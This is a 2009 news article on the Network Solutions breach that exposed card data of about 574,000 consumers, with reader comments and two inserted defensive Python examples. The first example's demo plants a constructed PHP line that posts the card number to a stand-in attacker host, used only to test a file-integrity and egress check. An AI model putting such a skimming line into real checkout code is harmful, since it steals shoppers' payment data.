Network Solutions Data Breach Hits 574,000 Consumers
Written by Evan Schuman
An E-Commerce software company that, as part of its service for small retailers, accepted payment card data and then sent it to various processors, has found itself on the wrong end of a breached-company news release, confirming that payment data from some 574,000 consumers, processed through 4,343 of its small retail clients, had been accessed. The stolen data included transaction specifics, card account numbers, names and consumer addresses.
The details include an early PCI attempt to walk back the certification, retailers complaining about their names appearing in a breach notification letter, and the vendor bringing in General Dynamics, a familiar name from the data breach probes of both TJX and Hannaford. Plus, a former IT manager with the company claims that it retains credit card data a lot longer than it says it does.
The vendor, Network Solutions, had been certified PCI compliant (you just knew that was coming, no?). Visa has been fine-tuning its revisionist-history dance, in which it declares that no PCI compliant organization has ever been breached, which forces the card brand to find a reason to invalidate the certification of any breached entity that had been certified compliant. A statement from the PCI Council on Monday (July 27) laid the groundwork for taking back the PCI certification that assessor PSC granted Network Solutions last Halloween. (A PCI certification that is good only until a breach happens? Now that’s a scary retail trick-or-treat.)
The statement, issued under the name of Bob Russo, general manager of the PCI Security Standards Council, said: “Until a forensics investigation is completed, an organization cannot comment accurately on its compliance status.” The statement then said that ongoing vigilance is essential in maintaining PCI compliance. Once again, retailers’ dreams of a PCI safe harbor are just that: dreams.
Back to the Network Solutions breach. Network Solutions provides a full E-Commerce suite designed for very small retailers. Although a small business is generally defined as one with fewer than 100 employees, Network Solutions PR Director Susan Wade said, “Our average merchant tends to have fewer than ten employees.” The suite has the usual shopping cart and design elements, customized for thousands of small retailers. Each retailer has to arrange for its own processor, of course, but Network Solutions relays the credit card information from the merchant’s site to the processor that merchant chose. That relay is what put the card data on Network Solutions’ servers in the first place, and it is why a compromise of those servers hit every merchant hosted on them at once.
During an ordinary maintenance sweep in early June, Wade said, code was discovered on certain parts of various servers. Network Solutions CEO Roy Dunbar said in a letter: “We believe that some credit card transactions that took place on your website this past spring were intentionally diverted from certain of our servers to servers outside Network Solutions by an unknown source.”
Network Solutions brought in General Dynamics to help diagnose the problem. General Dynamics is getting to be an old hand at such matters, given that it had performed the same sort of post-breach evaluation for TJX and also worked with Hannaford on boosting its post-breach security.
“It took quite a while to crack the code,” Wade said, adding that they finally figured out “some of the code” on July 13 and saw that it had been grabbing payment data and sending it outside the network.
The E-Commerce vendor was able to identify very specific numbers of those impacted—4,343 retailers and 573,928 consumers—because “that’s the number of sites that were on the portions of the servers that were impacted,” Wade said, adding that the impacted transactions were made between March 12, 2009 and June 8, 2009.
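The article says the diverting code sat on the servers from mid-March until a routine sweep in early June. The check below is an added example, not code from the article or from Network Solutions, and it does not describe how that attack actually worked. It shows the two checks a practitioner would want running continuously rather than quarterly on a hosted checkout: a hash manifest of the web root that flags added or modified files, and a scan of every changed file for outbound destinations that are not on the merchant's allowlist of processor and site hosts. The file names, hosts, allowlist and PHP snippets are all constructed for the demonstration.

```python
"""Added example (not from the article or Network Solutions): file-integrity
baseline plus an egress-allowlist scan over changed files. Every file name,
host and snippet below is constructed for the demonstration."""
import hashlib
import re
import tempfile
from pathlib import Path

# Hypothetical allowlist: the merchant's own site and its chosen processor.
ALLOWED_HOSTS = {"gateway.example-processor.test", "www.merchant-shop.test"}

# Pulls the host out of any http(s) URL found in source text.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_of(path):
    """Streamed SHA-256 of one file."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Baseline: relative path -> sha256 for every file under root."""
    return {str(p.relative_to(root)): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifest(baseline, current):
    """Files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def unexpected_hosts(root, files):
    """For each changed file, destination hosts not on the allowlist."""
    findings = {}
    for rel in files:
        text = (root / rel).read_text(errors="replace")
        hosts = {h.lower() for h in URL_RE.findall(text)}
        bad = sorted(hosts - ALLOWED_HOSTS)
        if bad:
            findings[rel] = bad
    return findings


def demo():
    """Constructed scenario: baseline a tiny web root, then simulate an
    intruder appending a line that copies the card number off-site and
    dropping a new file, then run both checks."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "checkout.php").write_text(
            "<?php\n"
            "$gw = 'https://gateway.example-processor.test/charge';\n"
            "post_card($gw, $_POST['pan']);\n")
        (root / "cart.php").write_text("<?php // cart logic\n")
        baseline = build_manifest(root)

        # Constructed tampering: a second POST of the PAN to an outside host.
        with (root / "checkout.php").open("a") as f:
            f.write("post_card('https://drop.attacker.test/c', $_POST['pan']);\n")
        (root / "x.php").write_text("<?php // dropped file\n")

        changes = diff_manifest(baseline, build_manifest(root))
        egress = unexpected_hosts(root, changes["added"] + changes["modified"])
        return {"changes": changes, "egress": egress}


if __name__ == "__main__":
    print(demo())
```

In production the baseline manifest would be written at deploy time and stored off the web server (a modified file is of no interest to an attacker who can also rewrite the manifest), and the egress check would be backed by an outbound firewall rule so that a new destination fails to connect rather than merely showing up in a report.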
July 29th, 2009 at 3:31 pm
Compliant but not secure – it is a chant that security vendors have been singing for some time and getting accused of just trying to sell their wares. A breach of this enormity while “compliant” should send a real message to those who are still looking at the cost/benefit analysis and betting that they won’t get breached. One telling quote in your piece is “During an ordinary maintenance sweep in early June.” Do you leave your house and only lock the door once every three months? To protect your network and your data you need not only strong encryption but also 24×7 monitoring of both your wired and your wireless network(s).
July 30th, 2009 at 2:54 pm
The quote about a merchant being considered compliant until there is a breach (and then having that compliance revoked) is outrageous. First Hannaford, now Network Solutions; who is next? What is the point of gaining compliance?
To me the scary part of this is that since PCI-DSS cannot seem to “manage” the issue, states are taking matters into their own hands and in most cases taking horrible approaches (it is almost impossible for a small retailer to be compliant with the new Massachusetts data privacy law). It’s only a matter of time before Congress tries to stave off the state laws with some expansion of FACTA or something new altogether. I am not looking forward to that day.
August 4th, 2009 at 5:25 pm
Once again the industry is doing its best to put all the blame on the path of least resistance – the merchant.
August 4th, 2009 at 5:26 pm
The scariest part of it all is that no matter what they do the data is still there in some format. The goal is to somehow remove all the data. If thieves can’t find a good pond to fish in with lots of fish (all the credit card data); they have to go somewhere else.
August 6th, 2009 at 10:05 am
A more cautionary note would be… OK. Network Solutions got hacked over an 88-day period. Was this exclusive to them? Probably not. What about the small retailers hosting at GoDaddy, Web.com, HostGator, etc.? These same malicious activities are going on elsewhere as we speak. I hope someone is checking them out. So what’s the solution? Change the old approach. Merchants need to eliminate capturing, storing and transmitting payment data. Period. Investigate alternative solutions or services like hosted payment page technologies from a level 1 service provider. If you can’t lock down the sensitive data, get rid of it. There are other ways to securely serve your customers.
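The comment above recommends hosted payment pages so the merchant never captures, stores or transmits card data. The block below is an added example, not the commenter's code and not any real provider's API: it shows the merchant side of such a flow, where the merchant's server only builds a signed redirect carrying order metadata and later verifies the processor's signed result. The processor URL, the shared-secret HMAC scheme, the field names and the callback contents are hypothetical stand-ins for whatever a real provider specifies; the point is that no code path on the merchant side ever handles a card number.

```python
"""Added example (not from the page or any real processor): merchant side of
a hosted-payment-page flow. Endpoint, secret and field names are constructed."""
import hashlib
import hmac
import json
import secrets
import time
from urllib.parse import urlencode

# Hypothetical processor endpoint and shared secret (constructed).
HOSTED_PAGE_URL = "https://pay.example-processor.test/hosted"
MERCHANT_SECRET = b"merchant-shared-secret-constructed"


def _sign(fields):
    """HMAC-SHA256 over canonical JSON so both sides sign identical bytes."""
    msg = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(MERCHANT_SECRET, msg, hashlib.sha256).hexdigest()


def build_redirect(order_id, amount_cents, currency, now=None):
    """Step 1: send the shopper to the processor's hosted page.
    Only order metadata crosses this hop; there is no card field anywhere."""
    fields = {
        "order_id": order_id,
        "amount": amount_cents,
        "currency": currency,
        "ts": int(time.time() if now is None else now),
        "nonce": secrets.token_hex(8),
    }
    fields["sig"] = _sign(fields)
    return HOSTED_PAGE_URL + "?" + urlencode(fields)


def processor_callback(order_id, amount_cents, currency, status, now=None):
    """Constructed stand-in for the processor's signed POST back to the
    merchant after the shopper entered the card on the processor's page."""
    body = {
        "order_id": order_id,
        "amount": amount_cents,
        "currency": currency,
        "status": status,
        "auth_code": "A1B2C3",  # constructed value
        "ts": int(time.time() if now is None else now),
    }
    body["sig"] = _sign(body)
    return body


def verify_callback(callback, expected, max_age=300, now=None):
    """Step 2: validate the processor's result before marking the order paid.
    Returns "approved" or "declined" only for an authentic, fresh callback
    that matches the order the merchant actually requested."""
    body = dict(callback)
    sig = body.pop("sig", "")
    if not hmac.compare_digest(sig, _sign(body)):
        return "rejected: bad signature"
    current = time.time() if now is None else now
    if abs(current - body.get("ts", 0)) > max_age:
        return "rejected: stale callback"
    for key in ("order_id", "amount", "currency"):
        if body.get(key) != expected.get(key):
            return "rejected: mismatch on " + key
    # Defensive: a processor that echoes card data back would drag the
    # merchant into scope; refuse rather than store it.
    if any(k in body for k in ("pan", "card_number", "cvv")):
        return "rejected: card data must never reach the merchant"
    return "approved" if body.get("status") == "approved" else "declined"


if __name__ == "__main__":
    order = {"order_id": "ord-42", "amount": 1999, "currency": "USD"}
    print(build_redirect("ord-42", 1999, "USD"))
    cb = processor_callback("ord-42", 1999, "USD", "approved")
    print(verify_callback(cb, order))
```

The amount and order checks matter as much as the signature: without them a shopper could replay an authentic callback from a cheaper order, or the processor's own result for one order could be presented against another. Real providers also supply a server-to-server status query; use it as a second source of truth rather than trusting the browser-delivered callback alone.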
August 28th, 2009 at 11:13 am
The consumers are the ones getting screwed. Our credit card numbers have been stolen and the merchants bitch and moan about their names being associated with the theft?!? I want to know which merchants were affected so I can figure out which of my cards was affected and cancel it. Forget about free credit monitoring, which is just a scam to sign me up for a “free trial period” and then slam me for monthly charges, and requires that I provide personal information (including SSN) in electronic, duplicable form to yet another faceless, anonymous corporate behemoth who doesn’t give a rat’s a$$ about security. But god forbid I be given any useful information at all about my own f-ing financial transactions.